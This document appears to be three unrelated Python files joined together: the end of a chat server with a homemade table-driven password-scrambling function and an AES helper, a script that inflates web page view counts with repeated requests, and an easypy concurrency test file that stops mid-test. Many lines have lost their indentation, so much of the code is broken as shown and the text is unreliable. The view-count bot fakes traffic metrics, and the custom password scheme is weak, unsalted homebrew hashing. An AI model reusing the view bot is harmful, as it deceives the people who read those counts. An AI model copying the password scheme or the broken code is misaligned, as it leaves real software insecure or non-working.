['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '37', '38', '39', '30', '3a', '6e', '6f', '71', '78', '79', '26', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '3e', '3f', '41', '42', '49', '21', '22', '5c', '5d', '5e', '5f', '61', '62', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '56', '57', '58', '59', '50', '5a', '5b', '46', '47', '48', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '33', '34', '35', '36'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '50', '5a', '5b', '46', '47', '48', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '33', '34', '35', '36', '37', '38', '26', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '61', '62', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '56', '57', '58', '59', '39', '30', '3a', '6e', '6f', '71', '78', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c', '5d', '5e', '5f'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '61', '62', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '5d', '5e', '5f', '56', '57', '58', '59', '39', '30', '3a', '6e', '6f', '71', '78', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c', '48', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '33', '34', '35', '36', '37', '38', '26', '50', '5a', '5b', '46', '47', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c', '48', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '5d', '33', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '61', '62', '63', '64', '43', '44', '45', '3a', '6e', '6f', '71', '78', '37', '38', '26', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '5e', '5f', '56', '57', '58', '59', '39', '30'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '5d', '33', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '61', '62', '63', '64', '43', '44', '45', '56', '57', '58', '59', '39', '30', '3a', '6e', '6f', '71', '78', '37', '38', '26', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '3c', '3d', '61', '62', '63', '64', '43', '44', '45', '56', '57', '68', '69', '60', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '5d', '33', '34', '35', '36', '50', '5a', '31', '58', '59', '39', '30', '3a', '6e', '6f', '71', '78', '37', '38', '26', '5b', '46', '47', '27', '28', '29', '70', '7a', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '79', '3e', '3f', '41', '42', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '3c', '3d', '61', '62', '63', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '58', '59', '39', '30', '3a', '6e', '6f', '71', '64', '43', '44', '45', '56', '57', '68', '69', '60', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '5d', '33', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '29', '70', '7a', '78', '37', '38', '26'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '79', '3e', '3f', '41', '5d', '33', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '29', '70', '7a', '78', '37', '38', '26', '42', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '58', '59', '39', '30', '3a', '6e', '6f', '71', '64', '43', '44', '45', '56', '57', '68', '69', '60', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '3c', '3d', '61'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '29', '70', '7a', '78', '37', '38', '26', '42', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '79', '3e', '3f', '41', '5d', '33', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '6a', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '3c', '3d', '61', '2f', '31', '58', '59', '39', '30', '3a', '6e', '6f', '71', '64', '43', '44', '45', '56', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '56', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '7e', '7f', '20', '2a', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '79', '3e', '3f', '41', '5d', '33', '3c', '3d', '61', '2f', '31', '58', '59', '39', '30', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '6d', '74', '75', '76', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '6d', '74', '75', '76', '56', '49', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '79', '3e', '3f', '41', '5d', '33', '3c', '3d', '61', '2f', '31', '58', '59', '39', '30'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '6d', '74', '75', '76', '56', '49', '79', '3e', '3f', '41', '5d', '33', '3c', '3d', '61', '2f', '31', '58', '59', '39', '30', '21', '22', '5c', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '7e'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '49', '79', '3e', '3f', '41', '5d', '33', '3c', '3d', '61', '2f', '31', '58', '59', '39', '30', '21', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '55', '52', '53', '72', '73', '5e', '5f', '65', '66', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '6d', '74', '75', '76', '56'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '39', '30', '21', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '48', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '55', '6d', '74', '75', '76', '49', '79', '3e', '3f', '41', '5d', '33', '3c', '3d', '61', '2f', '31', '58', '59', '56', '52', '53', '72', '73', '5e', '5f', '65', '66', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '4c', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '55', '6d', '74', '75', '76', '49', '79', '3e', '3f', '41', '5d', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '33', '3c', '39', '30', '21', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '48', '23', '24', '25', '40', '4a', '4b', '3d', '61', '2f', '31', '58', '59', '56', '52', '53', '72', '73', '5e', '5f', '65', '66', '46', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '28', '6a', '29', '70', '7a', '78', '37', '38', '26', '42', '46', '4c', '55', '6d', '74', '75', '76', '49', '79', '3e', '3f', '41', '5d', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '33', '3c', '39', '30', '21', '4d', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '2e', '57', '68', '69', '60', '48', '23', '24', '25', '40', '4a', '4b', '3d', '61', '2f', '31', '58', '59', '56', '52', '53', '72', '73', '5e', '5f', '65', '66', '47', '27'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '25', '40', '4a', '3f', '41', '5d', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '64', '43', '44', '45', '6b', '6c', '33', '3c', '39', '30', '21', '4d', '4c', '55', '6d', '74', '75', '76', '49', '79', '3e', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '69', '60', '48', '23', '24', '4b', '3d', '61', '2f', '31', '58', '59', '56', '52', '53', '72', '38', '26', '42', '73', '5e', '66', '47', '27', '28', '6a', '29', '70', '7a', '78', '37', '46', '5f', '65', '2e', '57', '68'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '64', '43', '44', '45', '6b', '6c', '33', '3c', '39', '30', '21', '4d', '4c', '70', '7a', '78', '37', '46', '5f', '65', '2e', '57', '68', '55', '6d', '74', '75', '76', '49', '25', '40', '4a', '3f', '41', '5d', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '79', '3e', '4e', '4f', '51', '62', '63', '7b', '7c', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '69', '60', '48', '23', '24', '4b', '3d', '61', '2f', '31', '58', '59', '56', '52', '53', '72', '38', '26', '42', '73', '5e', '66', '47', '27', '28', '6a', '29'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '3c', '39', '30', '21', '4d', '4c', '70', '7a', '78', '37', '46', '5f', '65', '2e', '57', '68', '55', '6d', '74', '75', '76', '49', '25', '40', '4a', '3f', '41', '5d', '7e', '7f', '20', '2a', '3a', '6e', '6f', '71', '79', '3e', '4e', '4f', '51', '62', '63', '7b', '7c', '52', '53', '72', '38', '26', '42', '73', '5e', '64', '43', '44', '45', '6b', '6c', '33', '66', '47', '27', '28', '6a', '29', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '22', '5c', '67', '32', '3b', '2b', '2c', '2d', '69', '60', '48', '23', '24', '4b', '3d', '61', '2f', '31', '58', '59', '56'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '60', '48', '23', '24', '4b', '3d', '61', '2f', '31', '58', '59', '56', '7f', '20', '2a', '3a', '6e', '6f', '71', '79', '3e', '57', '68', '55', '6d', '74', '75', '76', '49', '25', '40', '4a', '3f', '41', '5d', '7e', '2d', '69', '4e', '4f', '51', '62', '63', '7b', '7c', '52', '53', '72', '38', '26', '42', '73', '5e', '3c', '39', '30', '21', '4d', '4c', '70', '7a', '78', '37', '46', '5f', '65', '2e', '64', '43', '44', '45', '6b', '6c', '33', '66', '47', '27', '28', '6a', '29', '7d', '34', '35', '36', '50', '5a', '5b', '77', '54', '22', '5c', '67', '32', '3b', '2b', '2c'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '20', '28', '6f', '71', '78', '38', '79', '6c', '29', '70', '7b', '26', '7a', '27', '7c', '7d', '7e', '7f', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '3e', '3f', '41', '42', '49', '21', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '66', '67', '22', '5c', '5d', '5e', '5f', '61', '62', '68', '69', '60', '4b', '4c', '6a', '6b', '4d', '4e', '4f', '51', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '56', '57', '58', '59', '50', '5a', '5b', '46', '47', '48', '65', '6d', '33', '34', '35', '36', '37', '39', '30', '3a', '6e'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '27', '7c', '7d', '7e', '7f', '2a', '59', '50', '5a', '5b', '46', '47', '48', '65', '6d', '33', '34', '35', '36', '37', '39', '30', '3a', '6e', '2b', '2c', '2d', '2e', '2f', '31', '32', '3b', '3c', '3d', '3e', '3f', '41', '42', '49', '21', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '66', '67', '22', '5c', '5d', '5e', '5f', '61', '62', '68', '69', '60', '4b', '4c', '6a', '6b', '4d', '4e', '4f', '51', '20', '28', '6f', '71', '78', '38', '79', '6c', '29', '70', '7b', '26', '7a', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '56', '57', '58'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '48', '34', '7c', '27', '7d', '65', '6d', '33', '7e', '47', '35', '7f', '37', '39', '6e', '2b', '2c', '2d', '2e', '2f', '31', '3b', '3f', '41', '3c', '3d', '3e', '42', '49', '21', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '66', '67', '22', '5c', '5f', '61', '5d', '5e', '69', '60', '4b', '4c', '6a', '6b', '4d', '4e', '4f', '51', '62', '68', '20', '28', '6f', '71', '74', '75', '38', '79', '6c', '29', '70', '7b', '26', '7a', '52', '76', '78', '77', '54', '55', '56', '57', '58', '53', '72', '73', '2a', '59', '50', '5a', '5b', '46', '32', '30', '3a', '36'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '2f', '31', '3b', '3f', '41', '3c', '3d', '3e', '42', '5b', '46', '32', '30', '3a', '36', '35', '7f', '37', '39', '6e', '2b', '2c', '2d', '2e', '49', '21', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '66', '67', '22', '5c', '5f', '61', '5d', '5e', '69', '60', '4b', '4c', '6a', '6b', '4d', '4e', '4f', '51', '62', '68', '20', '28', '6f', '71', '74', '75', '38', '79', '6c', '29', '70', '7b', '26', '73', '2a', '59', '50', '5a', '7a', '52', '76', '78', '77', '54', '55', '56', '57', '27', '7d', '65', '6d', '33', '7e', '47', '58', '53', '72', '48', '34', '7c'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '5b', '46', '32', '30', '3a', '36', '35', '7f', '37', '39', '6e', '2b', '2c', '2d', '2e', '2f', '31', '3b', '3f', '41', '3c', '3d', '3e', '42', '49', '21', '63', '64', '43', '44', '45', '23', '24', '25', '40', '4a', '66', '67', '22', '5c', '5f', '61', '5d', '5e', '69', '60', '4b', '4c', '6a', '6b', '4d', '4e', '4f', '51', '62', '68', '20', '28', '6f', '71', '74', '77', '54', '78', '56', '48', '34', '7c', '55', '75', '38', '79', '6c', '29', '70', '7b', '26', '73', '2a', '59', '50', '5a', '7a', '52', '76', '27', '7d', '65', '6d', '33', '7e', '47', '57', '58', '53', '72'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '39', '6e', '2b', '5b', '46', '32', '30', '3a', '36', '35', '7f', '37', '64', '43', '2d', '2e', '2f', '2c', '42', '49', '21', '63', '31', '3b', '3f', '41', '3c', '3d', '3e', '44', '5a', '7a', '52', '76', '27', '7d', '65', '6d', '33', '7e', '47', '57', '45', '23', '4c', '6a', '24', '25', '40', '4a', '66', '67', '22', '5c', '5f', '61', '5d', '5e', '69', '60', '4b', '6b', '7c', '55', '75', '38', '79', '6c', '29', '70', '7b', '26', '73', '2a', '59', '50', '4d', '68', '20', '28', '6f', '71', '74', '4e', '4f', '51', '62', '77', '54', '78', '56', '48', '58', '53', '72', '34'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '35', '7f', '37', '64', '43', '2d', '39', '6e', '2b', '5b', '46', '32', '30', '3a', '36', '2e', '31', '3b', '27', '7d', '65', '6d', '2f', '2c', '42', '49', '21', '63', '33', '7e', '47', '57', '45', '3f', '41', '3c', '3d', '3e', '44', '5a', '7a', '52', '76', '23', '4c', '6a', '24', '67', '22', '5c', '5f', '61', '5d', '25', '40', '4a', '66', '5e', '69', '60', '4b', '6b', '7c', '4f', '51', '62', '77', '54', '78', '56', '48', '58', '53', '72', '34', '55', '75', '38', '79', '6c', '29', '70', '7b', '26', '73', '2a', '59', '50', '4d', '68', '20', '28', '6f', '71', '74', '4e']
]
hexlist = []
for char in inp:
hexlist.append(str(char.encode("hex")))
addlist = []
maxi = len(inp)
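    # Pad the input out to 28 characters by cycling over it and substituting
    # each byte through the table for the current output position.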
if len(inp) < 28:
for num in range(28 - maxi):
if tick == maxi:
tick = 0
addlist.append(hexlists[num + maxi - 1][int(hexlist[tick], 16)])
else:
addlist.append(hexlists[num + maxi - 1][int(hexlist[tick], 16)])
tick = tick + 1
    hexlist.extend(addlist)
hexlist1 = []
for hexdig in hexlist:
tmp = ""
if hexdig[1] == 0 or hexdig[1] == 1 or hexdig[1] == 8 or hexdig[1] == 9 or hexdig[1] == "a" or hexdig[1] == "b" or hexdig[1] == "c" or hexdig[1] == "d" or hexdig[1] == "e" or hexdig[1] == "f":
tmp = hexdig[1]
tmp = tmp + hexdig[0]
else:
tmp = hexdig
hexlist1.append(tmp)
evens = []
odds = []
for hexdig in hexlist1:
evens.append(hexdig[0])
odds.append(hexdig[1])
    # Rotate the low nibbles right by one position.
    odds1 = [odds[-1]] + odds[:-1]
hexlist = []
for tick in range(len(evens)):
hexlist.append(evens[tick] + odds1[tick])
outp = ""
for hexdig in hexlist:
outp = outp + hexdig.decode("hex")
return outp
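# Usage sketch (hedged): yash() runs a short string through the substitution
# tables above, pads it to 28 characters, and nibble-rotates the result. It
# appears to back the 'yash' password column in the userbase table; the input
# below is illustrative only.
#   stored = yash("hunter2")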
BS = 16  # AES block size in bytes
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)  # PKCS#7-style padding
unpad = lambda s: s[:-ord(s[len(s) - 1:])]  # strip PKCS#7-style padding
def ping(sock):
while True:
sock.send("ping")
time.sleep(1)
class AESCipher:
    def __init__(self, key):
        self.key = key

    def encrypt(self, raw):
        raw = pad(raw)
        iv = Random.new().read(AES.block_size)
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return base64.b64encode(iv + cipher.encrypt(raw))

    def decrypt(self, enc):
        enc = base64.b64decode(enc)
        iv = enc[:16]
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return unpad(cipher.decrypt(enc[16:]))
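# Usage sketch (hedged): assuming the PyCrypto AES/Random imports above, a
# round trip looks like this; the 16-byte key is illustrative only.
#   cipher = AESCipher("0123456789abcdef")
#   token = cipher.encrypt("hello")
#   assert cipher.decrypt(token) == "hello"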
if __name__ == "__main__":
    threading.Thread(target=writeoutput, args=(q, errors)).start()
    threading.Thread(target=console, args=(q, errors, motd)).start()
    Server('', port, q, motd, errors, mesg, quit, online, conn, c).listen()
|
gh-views-bot.py
|
import sys
import time
import threading
import requests
from utils import to_int_or
CURSOR_UP_ONE = '\x1b[1A'
ERASE_LINE = '\x1b[2K'
def request_task(url, data, headers):
requests.get(url, json=data, headers=headers)
def fire_and_forget(url, json=None, headers=None):
    # None defaults avoid the mutable-default-argument pitfall.
    threading.Thread(target=request_task, args=(url, json or {}, headers or {})).start()
def increase_views(url, num, timeout):
print()
for i in range(num):
fire_and_forget(url)
sys.stdout.flush()
print(f"{CURSOR_UP_ONE}{ERASE_LINE}Added: {i+1}/{num}")
time.sleep(timeout / 1000)
def increase_views_infinite(url, timeout):
print()
i = 0
while True:
fire_and_forget(url)
sys.stdout.flush()
print(f"{CURSOR_UP_ONE}{ERASE_LINE}Added: {i+1}/...")
time.sleep(timeout / 1000)
i += 1
def get_argv_or(argname, default):
return sys.argv[sys.argv.index(argname) + 1] if (argname in sys.argv) else default
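# Usage sketch (hedged; the URL is illustrative): -url is required, -n and -t
# optional.
#   python gh-views-bot.py -url https://example.com/counter -n 50 -t 500
#   python gh-views-bot.py -url https://example.com/counter --infinite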
URL = sys.argv[sys.argv.index("-url") + 1]
num = to_int_or(get_argv_or("-n", "10"), 10)
timeout = to_int_or(get_argv_or("-t", "1000"), 1000)
print("views increaser:")
try:
if "--infinite" in sys.argv:
        increase_views_infinite(URL, timeout)
else:
        increase_views(URL, num, timeout)
except KeyboardInterrupt:
print(f"{ERASE_LINE}>>> Exit <<<")
|
test_concurrency.py
|
from unittest.mock import patch
import pytest
from time import sleep
from easypy.threadtree import get_thread_stacks, ThreadContexts
from easypy.concurrency import concurrent, MultiObject, MultiException
@pytest.fixture(params=[True, False], ids=['concurrent', 'nonconcurrent'])
def concurrency_enabled_and_disabled(request):
if request.param: # concurrency enabled
yield
else: # concurrency disabled
from easypy.concurrency import disable, enable
try:
disable()
yield
finally:
enable()
def test_thread_stacks():
with concurrent(sleep, .1, threadname='sleep'):
print(get_thread_stacks().render())
def test_thread_contexts_counters():
TC = ThreadContexts(counters=('i', 'j'))
assert TC.i == TC.j == 0
with TC(i=1):
def check1():
assert TC.i == 1
assert TC.j == 0
with TC(i=1, j=1):
def check2():
assert TC.i == 2
assert TC.j == 1
with concurrent(check2):
pass
with concurrent(check1):
pass
def test_thread_contexts_counters_multiobject():
TC = ThreadContexts(counters=('i',))
assert TC.i == 0
print("---")
@TC(i=True)
def test(n):
print(n, TC._context_data)
sleep(.1)
return TC.i
test(0)
ret = MultiObject(range(10)).call(test)
assert set(ret) == {1}
def test_thread_context_stacks():
TC = ThreadContexts(stacks=('i', 'j'))
assert TC.i == TC.j == []
with TC(i='a'):
def check1():
assert TC.i == ['a']
assert TC.j == []
with TC(i='i', j='j'):
def check2():
assert TC.i == ['a', 'i']
assert TC.j == ['j']
with concurrent(check2):
pass
with concurrent(check1):
pass
def test_multiobject_0():
x = MultiObject([]).foo()
assert len(x) == 0
assert x.__class__.CONCESTOR is object
def test_multiobject_1():
m = MultiObject(range(10))
def mul(a, b, *c):
return a * b + sum(c)
assert sum(m.call(mul, 2)) == 90
assert sum(m.call(mul, b=10)) == 450
assert sum(m.call(mul, 1, 1, 1)) == 65
assert m.filter(None).T == (1, 2, 3, 4, 5, 6, 7, 8, 9)
assert sum(m.denominator) == 10
with pytest.raises(MultiException) as info:
m.call(lambda i: 1 / (i % 2))
assert info.value.count == 5
assert info.value.common_type == ZeroDivisionError
assert not info.value.complete
def test_multiobject_exceptions():
assert MultiException[ValueError] is MultiException[ValueError]
assert issubclass(MultiException[UnicodeDecodeError], MultiException[UnicodeError])
assert issubclass(MultiException[UnicodeDecodeError], MultiException[ValueError])
with pytest.raises(AssertionError):
MultiException[0]
with pytest.raises(MultiException):
MultiObject(range(5)).call(lambda n: 1 / n)
with pytest.raises(MultiException[Exception]):
MultiObject(range(5)).call(lambda n: 1 / n)
with pytest.raises(MultiException[ZeroDivisionError]):
MultiObject(range(5)).call(lambda n: 1 / n)
try:
MultiObject(range(5)).call(lambda n: 1 / n)
except MultiException[ValueError] as exc:
assert False
except MultiException[ZeroDivisionError] as exc:
assert len(exc.actual) == 1
assert isinstance(exc.one, ZeroDivisionError)
else:
assert False
with pytest.raises(MultiException[ArithmeticError]):
try:
MultiObject(range(5)).call(lambda n: 1 / n)
except ZeroDivisionError:
assert False # shouldn't be here
except MultiException[ValueError]:
assert False # shouldn't be here
class ExceptionForPicklingTest(ArithmeticError):
pass
def test_multiexception_pickling():
import pickle
import multiprocessing
def throw(n):
if not n:
raise ExceptionForPicklingTest(n)
def fail_and_dump(queue):
try:
MultiObject(range(5)).call(throw)
except MultiException[ArithmeticError] as exc:
p = pickle.dumps(exc)
queue.put_nowait(p)
queue = multiprocessing.Queue(1)
process = multiprocessing.Process(target=fail_and_dump, args=(queue,))
process.start()
process.join()
p = queue.get_nowait()
exc = pickle.loads(p)
assert isinstance(exc, MultiException[ExceptionForPicklingTest])
assert exc.common_type is ExceptionForPicklingTest
assert exc.exceptions[0].args == (0,)
assert exc.exceptions[1:] == [None] * 4
def test_multiobject_concurrent_find_found():
m = MultiObject(range(10))
from time import sleep
ret = m.concurrent_find(lambda n: sleep(n / 10) or n) # n==0 is not nonzero, so it's not eligible
assert ret == 1
def test_multiobject_concurrent_find_not_found():
m = MultiObject(range(10))
ret = m.concurrent_find(lambda n: n < 0)
assert ret is False
m = MultiObject([0] * 5)
ret = m.concurrent_find(lambda n: n)
assert ret == 0
def test_multiobject_concurrent_find_proper_shutdown():
executed = []
m = MultiObject(range(10), workers=1)
ret = m.concurrent_find(lambda n: [print(n) or executed.append(n) or sleep(.01)])
assert ret
sleep(1) # wait for potential stragglers
assert max(executed) <= 2
def test_multiobject_zip_with():
m = MultiObject(range(4))
with pytest.raises(AssertionError):
m.zip_with(range(3), range(5)) # too few objects
m.zip_with(range(5), range(6)) # too many objects
ret = m.zip_with(range(1, 5)).call(lambda a, b: a + b).T
assert ret == (1, 3, 5, 7)
def test_multiobject_enumerate():
m = MultiObject(range(5), log_ctx="abcd")
def check(i, j):
assert i == j + 1
e = m.enumerate(1)
assert e._log_ctx == tuple("abcd")
e.call(check)
def test_multiobject_logging():
m = MultiObject(range(4), log_ctx="abcd", initial_log_interval=0.1)
def check(i):
sleep(.2)
# we'll mock the logger so we can ensure it logged
with patch("easypy.concurrency._logger") as _logger:
